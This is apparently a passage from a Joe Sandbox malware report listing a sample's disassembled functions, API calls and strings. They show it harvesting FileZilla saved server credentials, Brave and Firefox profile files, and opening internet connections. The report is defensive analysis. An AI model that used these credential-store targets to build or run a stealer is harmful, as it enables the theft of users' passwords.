                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen$Find$File$CloseFirstNextwsprintf
                            • String ID: %s\*.*
                            • API String ID: 1006159827-1013718255
                            • Opcode ID: 5bbc43b952ff532e2dc84d14e986158186b249af3ec34ab2eb23714436bd15e4
                            • Instruction ID: cd84bc360484539ede4e4f4daac59e5a1f5b170844e909b00aeb4bd9387375ba
                            • Opcode Fuzzy Hash: 5bbc43b952ff532e2dc84d14e986158186b249af3ec34ab2eb23714436bd15e4
                            • Instruction Fuzzy Hash: 50627D71A26767AFCB61AF76CC58AEE77BAAF50300F044129B805A7351DB34DE01CB90
                            Function 006E6960 Relevance: 144.3, APIs: 72, Strings: 10, Instructions: 763stringmemoryCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006E6995
                            • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 006E69C8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E6A02
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E6A29
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006E6A34
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E6A5D
                            • lstrlen.KERNEL32(\AppData\Roaming\FileZilla\recentservers.xml), ref: 006E6A77
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E6A99
                            • lstrcat.KERNEL32(00000000,\AppData\Roaming\FileZilla\recentservers.xml), ref: 006E6AA5
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E6AD0
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E6B00
                            • LocalAlloc.KERNEL32(00000040,?), ref: 006E6B35
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006E6B9D
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006E6BCD
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$AllocFolderLocalPathlstrlen
                            • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                            • API String ID: 313953988-555421843
                            • Opcode ID: 720e5130f3145dbee3c345ff17aa33aba689578211559ab557df6ee01cb7cacc
                            • Instruction ID: 6643fb9987833ecd77577515445dbbc95ee51cf0e567d8d514d191208927921e
                            • Opcode Fuzzy Hash: 720e5130f3145dbee3c345ff17aa33aba689578211559ab557df6ee01cb7cacc
                            • Instruction Fuzzy Hash: 9642E270E16356AFCB21ABB6CC59BAEB7BBAF24740F044419F905E7352DB34D9018B90
                            Function 006DDB99 Relevance: 125.0, APIs: 68, Strings: 3, Instructions: 763stringfileCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006DDBC1
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006DDBE4
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006DDBEF
                            • lstrlen.KERNEL32(00704CA8), ref: 006DDBFA
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006DDC17
                            • lstrcat.KERNEL32(00000000,00704CA8), ref: 006DDC23
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006DDC4C
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006DDC8F
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006DDCBF
                            • FindFirstFileA.KERNEL32(00000000,?), ref: 006DDCD0
                            • StrCmpCA.SHLWAPI(?,007017A0), ref: 006DDCF0
                            • StrCmpCA.SHLWAPI(?,007017A4), ref: 006DDD0A
                            • lstrlen.KERNEL32(006FCFEC), ref: 006DDD1D
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006DDD47
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006DDD70
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006DDD7B
                            • lstrlen.KERNEL32(00701794), ref: 006DDD86
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006DDDA3
                            • lstrcat.KERNEL32(00000000,00701794), ref: 006DDDAF
                            • lstrlen.KERNEL32(?), ref: 006DDDBC
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006DDDDF
                            • lstrcat.KERNEL32(00000000,?), ref: 006DDDED
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006DDE19
                            • lstrlen.KERNEL32(00701794), ref: 006DDE3D
                            • lstrcpy.KERNEL32(00000000,?), ref: 006DDE6F
                            • lstrcat.KERNEL32(00000000,00701794), ref: 006DDE7B
                            • lstrlen.KERNEL32(01018B48), ref: 006DDE8A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006DDEB0
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006DDEBB
                            • lstrlen.KERNEL32(00701794), ref: 006DDEC6
                            • lstrcpy.KERNEL32(00000000,?), ref: 006DDEE6
                            • lstrcat.KERNEL32(00000000,00701794), ref: 006DDEF2
                            • lstrlen.KERNEL32(01018928), ref: 006DDF01
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006DDF27
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006DDF32
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006DDF5E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006DDFA5
                            • lstrcat.KERNEL32(00000000,00701794), ref: 006DDFB1
                            • lstrlen.KERNEL32(01018B48), ref: 006DDFC0
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006DDFE9
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006DDFF4
                            • lstrlen.KERNEL32(00701794), ref: 006DDFFF
                            • lstrcpy.KERNEL32(00000000,?), ref: 006DE022
                            • lstrcat.KERNEL32(00000000,00701794), ref: 006DE02E
                            • lstrlen.KERNEL32(01018928), ref: 006DE03D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006DE063
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006DE06E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006DE09A
                            • StrCmpCA.SHLWAPI(?,Brave), ref: 006DE0CD
                            • StrCmpCA.SHLWAPI(?,Preferences), ref: 006DE0E7
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006DE11F
                            • lstrlen.KERNEL32(0101DE28), ref: 006DE12E
                            • lstrcpy.KERNEL32(00000000,?), ref: 006DE155
                            • lstrcat.KERNEL32(00000000,?), ref: 006DE15D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006DE19F
                            • lstrcat.KERNEL32(00000000), ref: 006DE1A9
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006DE1D0
                            • CopyFileA.KERNEL32(00000000,?,00000001), ref: 006DE1F9
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006DE22F
                            • lstrlen.KERNEL32(010188F8), ref: 006DE23D
                            • lstrcpy.KERNEL32(00000000,?), ref: 006DE261
                            • lstrcat.KERNEL32(00000000,010188F8), ref: 006DE269
                            • FindNextFileA.KERNEL32(00000000,?), ref: 006DE988
                            • FindClose.KERNEL32(00000000), ref: 006DE997
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen$FileFind$CloseCopyFirstNext
                            • String ID: Brave$Preferences$\Brave\Preferences
                            • API String ID: 1346089424-1230934161
                            • Opcode ID: 01f8d51664ee83de9e2e895582338ecbbf483c73eb7128448a88c4abd1753466
                            • Instruction ID: 3b6cd5da72f71b81974e4b6434e6d4efe66169726693fcf10d9e466b1f5eae49
                            • Opcode Fuzzy Hash: 01f8d51664ee83de9e2e895582338ecbbf483c73eb7128448a88c4abd1753466
                            • Instruction Fuzzy Hash: 9D527CB0E2521A9FDB61AF75DC99AAE77BAAF54300F04412AF846DB351DB34DC018B90
                            Function 006D60D0 Relevance: 119.8, APIs: 66, Strings: 2, Instructions: 818stringnetworkCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,?), ref: 006D60FF
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006D6152
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006D6185
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006D61B5
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006D61F0
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006D6223
                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 006D6233
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$InternetOpen
                            • String ID: "$------
                            • API String ID: 2041821634-2370822465
                            • Opcode ID: 32ac470c948c9311755246b20cbbdc70cb2ea35d7f05cfbc2f81db47cf3ebe3f
                            • Instruction ID: 45e97b445087c7711615f06e8bd1687b94507b9f3ce460c35eb9964845c876b8
                            • Opcode Fuzzy Hash: 32ac470c948c9311755246b20cbbdc70cb2ea35d7f05cfbc2f81db47cf3ebe3f
                            • Instruction Fuzzy Hash: 84526C71E1421A9FDB61EFB5DC59BAE77BAAF14300F08802AF905AB351DB34DD018B94
                            Function 006E6B79 Relevance: 110.8, APIs: 54, Strings: 9, Instructions: 536stringmemoryencryptionCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006E6B9D
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006E6BCD
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006E6BFD
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006E6C2F
                            • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 006E6C3C
                            • RtlAllocateHeap.NTDLL(00000000), ref: 006E6C43
                            • StrStrA.SHLWAPI(00000000,<Host>), ref: 006E6C5A
                            • lstrlen.KERNEL32(00000000), ref: 006E6C65
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E6CA8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E6CCF
                            • StrStrA.SHLWAPI(00000000,<Port>), ref: 006E6CE2
                            • lstrlen.KERNEL32(00000000), ref: 006E6CED
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E6D30
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E6D57
                            • StrStrA.SHLWAPI(00000000,<User>), ref: 006E6D6A
                            • lstrlen.KERNEL32(00000000), ref: 006E6D75
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E6DB8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E6DDF
                            • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 006E6DF2
                            • lstrlen.KERNEL32(00000000), ref: 006E6E01
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E6E49
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E6E71
                            • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 006E6E94
                            • LocalAlloc.KERNEL32(00000040,00000000), ref: 006E6EA8
                            • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 006E6EC9
                            • LocalFree.KERNEL32(00000000), ref: 006E6ED4
                            • lstrlen.KERNEL32(?), ref: 006E6F6E
                            • lstrlen.KERNEL32(?), ref: 006E6F81
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$BinaryCryptHeapLocalString$AllocAllocateFreeProcess
                            • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$browser: FileZilla$login: $password: $profile: null$url:
                            • API String ID: 2641759534-2314656281
                            • Opcode ID: d1c81867631a9da00461bf2a116621144cd62a860cb23134f17ef8739d6ac984
                            • Instruction ID: db7c6c65bc328c192c93e04929cff8a8597d352e7673458713f8f67f6e683959
                            • Opcode Fuzzy Hash: d1c81867631a9da00461bf2a116621144cd62a860cb23134f17ef8739d6ac984
                            • Instruction Fuzzy Hash: 4702D3B0E26356AFCB20ABB6DC59BAE7BBAEF14740F144419F902D7352DB34D8018790
                            Function 006E4B10 Relevance: 79.8, APIs: 44, Strings: 1, Instructions: 1095stringfileCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006E4B51
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E4B74
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006E4B7F
                            • lstrlen.KERNEL32(00704CA8), ref: 006E4B8A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E4BA7
                            • lstrcat.KERNEL32(00000000,00704CA8), ref: 006E4BB3
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E4BDE
                            • FindFirstFileA.KERNEL32(00000000,?), ref: 006E4BFA
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                            • String ID: prefs.js
                            • API String ID: 2567437900-3783873740
                            • Opcode ID: c431fcf159d2fe28b2bab904fdc75f1af346027849f354a646be1d5959e14be3
                            • Instruction ID: 1217c6ac2f30a397ce450ce01755cbe1b1504f3c86796e7549b52620814beb32
                            • Opcode Fuzzy Hash: c431fcf159d2fe28b2bab904fdc75f1af346027849f354a646be1d5959e14be3
                            • Instruction Fuzzy Hash: 60924370A167428FDB64CF2AC958B99B7F6BF44318F19806DE40A9B3A2DB71DC41CB50
                            Function 006E1250 Relevance: 62.0, APIs: 41, Instructions: 525stringfileCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006E1291
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E12B4
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006E12BF
                            • lstrlen.KERNEL32(00704CA8), ref: 006E12CA
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E12E7
                            • lstrcat.KERNEL32(00000000,00704CA8), ref: 006E12F3
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E131E
                            • FindFirstFileA.KERNEL32(00000000,?), ref: 006E133A
                            • StrCmpCA.SHLWAPI(?,007017A0), ref: 006E135C
                            • StrCmpCA.SHLWAPI(?,007017A4), ref: 006E1376
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006E13AF
                            • lstrcpy.KERNEL32(00000000,?), ref: 006E13D7
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006E13E2
                            • lstrlen.KERNEL32(00701794), ref: 006E13ED
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E140A
                            • lstrcat.KERNEL32(00000000,00701794), ref: 006E1416
                            • lstrlen.KERNEL32(?), ref: 006E1423
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E1443
                            • lstrcat.KERNEL32(00000000,?), ref: 006E1451
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E147A
                            • StrCmpCA.SHLWAPI(?,0101DE70), ref: 006E14A3
                            • lstrcpy.KERNEL32(00000000,?), ref: 006E14E4
                            • lstrcpy.KERNEL32(00000000,?), ref: 006E150D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E1535
                            • StrCmpCA.SHLWAPI(?,0101E798), ref: 006E1552
                            • lstrcpy.KERNEL32(00000000,?), ref: 006E1593
                            • lstrcpy.KERNEL32(00000000,?), ref: 006E15BC
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E15E4
                            • StrCmpCA.SHLWAPI(?,0101DD98), ref: 006E1602
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E1633
                            • lstrcpy.KERNEL32(00000000,?), ref: 006E165C
                            • lstrcpy.KERNEL32(00000000,?), ref: 006E1685
                            • StrCmpCA.SHLWAPI(?,0101DDE0), ref: 006E16B3
                            • lstrcpy.KERNEL32(00000000,?), ref: 006E16F4
                            • lstrcpy.KERNEL32(00000000,?), ref: 006E171D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E1745
                            • lstrcpy.KERNEL32(00000000,?), ref: 006E1796
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E17BE
                            • lstrcpy.KERNEL32(00000000,?), ref: 006E17F5
                            • FindNextFileA.KERNEL32(00000000,?), ref: 006E181C
                            • FindClose.KERNEL32(00000000), ref: 006E182B
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                            • String ID:
                            • API String ID: 1346933759-0
                            • Opcode ID: e0e5f2654a96ed80d6d995f8d854e5a4c5d6685d502be0e0247ed01a4c1f0131
                            • Instruction ID: ee539c55e8418336389d62693da98697477bb3825a1ce75be74524680d23922e
                            • Opcode Fuzzy Hash: e0e5f2654a96ed80d6d995f8d854e5a4c5d6685d502be0e0247ed01a4c1f0131
                            • Instruction Fuzzy Hash: DB12A0B0A123469FCB60EF7ADC99AAE77BAAF45300F04452DB846DB351DB34DC419B90
                            Function 006ECBE0 Relevance: 54.6, APIs: 27, Strings: 4, Instructions: 310filestringCOMMON
                            Download Yara Rule
                            APIs
                            • wsprintfA.USER32 ref: 006ECBFC
                            • FindFirstFileA.KERNEL32(?,?), ref: 006ECC13
                            • lstrcat.KERNEL32(?,?), ref: 006ECC5F
                            • StrCmpCA.SHLWAPI(?,007017A0), ref: 006ECC71
                            • StrCmpCA.SHLWAPI(?,007017A4), ref: 006ECC8B
                            • wsprintfA.USER32 ref: 006ECCB0
                            • PathMatchSpecA.SHLWAPI(?,01018A78), ref: 006ECCE2
                            • CoInitialize.OLE32(00000000), ref: 006ECCEE
                              • Part of subcall function 006ECAE0: CoCreateInstance.COMBASE(006FB110,00000000,00000001,006FB100,?), ref: 006ECB06
